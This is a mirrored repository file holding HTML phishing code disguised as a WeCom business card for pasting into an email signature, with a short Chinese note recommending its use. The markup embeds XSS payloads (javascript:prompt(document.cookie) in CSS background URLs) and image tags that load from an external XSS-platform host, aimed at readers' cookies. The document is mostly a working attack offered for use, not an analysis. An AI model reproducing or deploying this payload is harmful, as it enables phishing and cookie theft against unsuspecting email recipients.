admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-29 05:57:37 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/tools/伪装成企业微信名片的钓鱼代码.txt

5 lines
3.0 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<style class="fox_global_style"> div.fox_html_content { line-height: 1.5;} /* 一些默认样式 */ blockquote { margin-Top: 0px; margin-Bottom: 0px; margin-Left: 0.5em } ol, ul { margin-Top: 0px; margin-Bottom: 0px; list-style-position: inside; } p { margin-Top: 0px; margin-Bottom: 0px } </style><div style="background-image:url(javascript:prompt(document.cookie))"><a target="_blank" contenteditable="false" href="https://skyblueeternal.github.io/" class="weworkSignature_link" style="text-decoration: none;display: inline-block"> <table data-wwcard="true" cellspacing="0" cellpadding="0" style="margin: 12px; background-color:#fff;border-radius:4px;overflow:hidden;border: 1px solid #E6E6E6"> <tbody><tr> <td colspan="3" height="10" style="line-height: 1;"> <div style="width: 10px; height: 10px;"> </div> </td> </tr> <tr> <td width="12"> <div style="width: 12px; height: 12px;"> </div> </td> <td valign="top"> <table cellspacing="0" cellpadding="0"> <tbody><tr> <td valign="top" align="left"> <div style="font-size: 14px; font-weight: bold; color: #000; line-height: 1;min-width: 60px;max-width:250px; min-width: 130px; word-break: break-word; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;">安全研究员</div> <div style="margin-top: 12px"> <div style="font-size: 12px; color: #353B42; margin-top: 6px; line-height: 1.3;max-width:250px;word-break: break-word; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;">666</div> <div style="font-size: 12px; color: #353B42; margin-top: 6px; line-height: 1.3;max-width:250px;word-break: break-word; white-space: nowrap; overflow: hidden; text-overflow: ellipsis;">天融信</div> </div> </td> <td width="20"> <div style="width: 20px; height: 12px;"></div> </td> <td valign="top" align="right" style="text-align: right; font-size: 12px; color: #1F6CD7; line-height: 16px;"> <div style="width: 75px;"> <a target="_blank" href="https://skyblueeternal.github.io/" class="weworkSignature_link" style="display: inline-block; background: #f2f5f7; border-radius: 12px; padding: 3px 11px 2px; color: #1F6CD7;line-height: 1.5; text-decoration: none;"> <img srcset="https://xsshs.cn/ZDTD/xss.jpg, https://xsshs.cn/ZDTD/xss.jpg" width="11" height="11" style="width: 11px; height: 11px; vertical-align: -1px;"> 联系我 </a> </div> <div style="height: 1px; overflow:hidden;"><img src="https://skyblueeternal.github.io/&quot;" style="width: 1px; height: 1px; background-image:url(javascript:prompt(document.cookie));"></div> </td> </tr> </tbody></table> </td> <td width="12"> <div style="width: 12px; height: 12px;"></div> </td> </tr> <tr> <td colspan="3" height="10" style="line-height: 1;"> <div style="width: 99999999999999px; height: 9999999999999px;"></div> </td> </tr> </tbody></table> </a></div>
分享一款伪装成企业微信名片的钓鱼邮件代码。我将企业微信电子名片改成钓鱼网址点之后进去第三方页面触发xss伪装相似度很高。感兴趣建议一试。
以上的代码: 复制到 邮件签名 打XSS。
来自知识星球:起源实验室
Reference in New Issue View Git Blame Copy Permalink